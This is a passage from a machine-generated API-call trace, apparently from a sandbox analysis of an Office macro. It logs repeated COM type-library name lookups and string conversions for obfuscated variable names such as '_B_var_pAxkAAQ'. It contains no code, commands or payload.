dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_qGAABAU") returned 15 [0068.962] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.962] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qGAABAU", lHashVal=0x100152, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.962] IUnknown:Release (This=0x665ba50) returned 0xd [0068.962] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.962] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qGAABAU", lHashVal=0x100152, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.962] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.962] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.962] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qGAABAU", lHashVal=0x100152, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.962] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.962] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.963] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qGAABAU", lHashVal=0x100152, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.963] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.963] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.963] IUnknown:Release (This=0x665ba50) returned 0xd [0068.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1061e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_qGAABAU") returned 15 [0068.963] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qGAABAU", lHashVal=0x100152, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0068.963] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61ad6 | out: _Dst=0x144ec0) returned 0x0 [0068.963] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pAxkAAQ", lHashVal=0x100cfe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61aae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pAxkAAQ") returned 8 [0068.963] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pAxkAAQ", lHashVal=0x100cfe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61aae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pAxkAAQ") returned 8 [0068.963] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pAxkAAQ", lHashVal=0x100cfe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.963] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pAxkAAQ") returned 0x100cfe [0068.963] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="pAxkAAQ" | out: _Dst="pAxkAAQ") returned 0x0 [0068.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="pAxkAAQ") returned 8 [0068.963] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.963] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pAxkAAQ", lHashVal=0x100cfe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.963] IUnknown:Release (This=0x665ba50) returned 0xd [0068.963] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.963] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pAxkAAQ", lHashVal=0x100cfe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.963] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.963] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.963] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pAxkAAQ", lHashVal=0x100cfe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.964] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.964] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.964] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pAxkAAQ", lHashVal=0x100cfe, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.964] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61aae, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pAxkAAQ") returned 8 [0068.964] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pAxkAAQ", lHashVal=0x100cfe, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.964] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.964] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61aae | out: _Dst=0x67c2d40) returned 0x0 [0068.964] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pAxkAAQ") returned 0x100101 [0068.964] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_pAxkAAQ" | out: _Dst="_B_var_pAxkAAQ") returned 0x0 [0068.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_pAxkAAQ") returned 15 [0068.964] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.964] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pAxkAAQ", lHashVal=0x100101, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.964] IUnknown:Release (This=0x665ba50) returned 0xd [0068.964] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.964] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pAxkAAQ", lHashVal=0x100101, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.964] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.964] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.964] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pAxkAAQ", lHashVal=0x100101, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.964] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.964] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.964] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pAxkAAQ", lHashVal=0x100101, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.964] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.964] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.964] IUnknown:Release (This=0x665ba50) returned 0xd [0068.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1064e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_pAxkAAQ") returned 15 [0068.964] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pAxkAAQ", lHashVal=0x100101, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0) returned 0x0 [0068.965] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61aae | out: _Dst=0x144ec0) returned 0x0 [0068.965] ITypeComp:RemoteBind (in: This=0x665ba60, szName="k4A4wA_Q", lHashVal=0x1028ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="k4A4wA_Q") returned 9 [0068.965] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="k4A4wA_Q", lHashVal=0x1028ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="k4A4wA_Q") returned 9 [0068.965] ITypeComp:RemoteBind (in: This=0x665bd30, szName="k4A4wA_Q", lHashVal=0x1028ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.965] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="k4A4wA_Q") returned 0x1028ef [0068.965] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="k4A4wA_Q" | out: _Dst="k4A4wA_Q") returned 0x0 [0068.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="k4A4wA_Q") returned 9 [0068.965] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.965] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="k4A4wA_Q", lHashVal=0x1028ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.965] IUnknown:Release (This=0x665ba50) returned 0xd [0068.965] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.965] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="k4A4wA_Q", lHashVal=0x1028ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.965] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.965] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.965] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="k4A4wA_Q", lHashVal=0x1028ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.965] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.965] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.965] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="k4A4wA_Q", lHashVal=0x1028ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.965] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="k4A4wA_Q") returned 9 [0068.965] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="k4A4wA_Q", lHashVal=0x1028ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.966] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.966] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61afe | out: _Dst=0x67c2d40) returned 0x0 [0068.966] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_k4A4wA_Q") returned 0x100078 [0068.966] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_k4A4wA_Q" | out: _Dst="_B_var_k4A4wA_Q") returned 0x0 [0068.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_k4A4wA_Q") returned 16 [0068.966] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.966] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_k4A4wA_Q", lHashVal=0x100078, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.966] IUnknown:Release (This=0x665ba50) returned 0xd [0068.966] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.966] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_k4A4wA_Q", lHashVal=0x100078, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.966] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.966] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.966] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_k4A4wA_Q", lHashVal=0x100078, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.966] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.966] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.966] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_k4A4wA_Q", lHashVal=0x100078, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.966] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.966] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.966] IUnknown:Release (This=0x665ba50) returned 0xd [0068.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1067e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_k4A4wA_Q") returned 16 [0068.966] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_k4A4wA_Q", lHashVal=0x100078, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x77003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x77003400000000, pDummy=0x0) returned 0x0 [0068.966] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61afe | out: _Dst=0x144ec0) returned 0x0 [0068.966] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OAQQkU", lHashVal=0x1045d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OAQQkU") returned 7 [0068.966] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OAQQkU", lHashVal=0x1045d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OAQQkU") returned 7 [0068.967] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OAQQkU", lHashVal=0x1045d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAQQkU") returned 0x1045d9 [0068.967] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="OAQQkU" | out: _Dst="OAQQkU") returned 0x0 [0068.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="OAQQkU") returned 7 [0068.967] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.967] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OAQQkU", lHashVal=0x1045d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.967] IUnknown:Release (This=0x665ba50) returned 0xd [0068.967] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.967] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OAQQkU", lHashVal=0x1045d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.967] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.967] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.967] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OAQQkU", lHashVal=0x1045d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.967] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.967] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.967] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OAQQkU", lHashVal=0x1045d9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.967] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b2a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="OAQQkU") returned 7 [0068.967] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OAQQkU", lHashVal=0x1045d9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.967] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.967] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a61b2a | out: _Dst=0x67c2d40) returned 0x0 [0068.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OAQQkU") returned 0x10c082 [0068.967] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_OAQQkU" | out: _Dst="_B_var_OAQQkU") returned 0x0 [0068.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_OAQQkU") returned 14 [0068.967] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.967] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OAQQkU", lHashVal=0x10c082, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.968] IUnknown:Release (This=0x665ba50) returned 0xd [0068.968] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.968] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OAQQkU", lHashVal=0x10c082, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.968] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.968] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.968] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OAQQkU", lHashVal=0x10c082, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.968] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.968] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.968] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OAQQkU", lHashVal=0x10c082, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.968] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.968] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.968] IUnknown:Release (This=0x665ba50) returned 0xd [0068.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b106ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_OAQQkU") returned 14 [0068.968] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OAQQkU", lHashVal=0x10c082, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x6b005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x6b005100000000, pDummy=0x0) returned 0x0 [0068.968] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a61b2a | out: _Dst=0x144ec0) returned 0x0 [0068.968] ITypeComp:RemoteBind (in: This=0x665ba60, szName="BkBXDZA", lHashVal=0x101622, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b7a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="BkBXDZA") returned 8 [0068.968] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="BkBXDZA", lHashVal=0x101622, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61b7a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="BkBXDZA") returned 8 [0068.968] ITypeComp:RemoteBind (in: This=0x665bd30, szName="BkBXDZA", lHashVal=0x101622, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.968] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BkBXDZA") returned 0x101622 [0068.968] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="BkBXDZA" | out: _Dst="BkBXDZA") returned 0x0 [0068.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="BkBXDZA") returned 8 [0068.969] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.969] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="BkBXDZA", lHashVal=0x101622, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.969] IUnknown:Release (This=0x665ba50) returned 0xd [0068.969] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.969] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="BkBXDZA", lHashVal=0x101622, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.969] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.969] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.969] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="BkBXDZA", lHashVal=0x101622, pfName=0x144bc0, 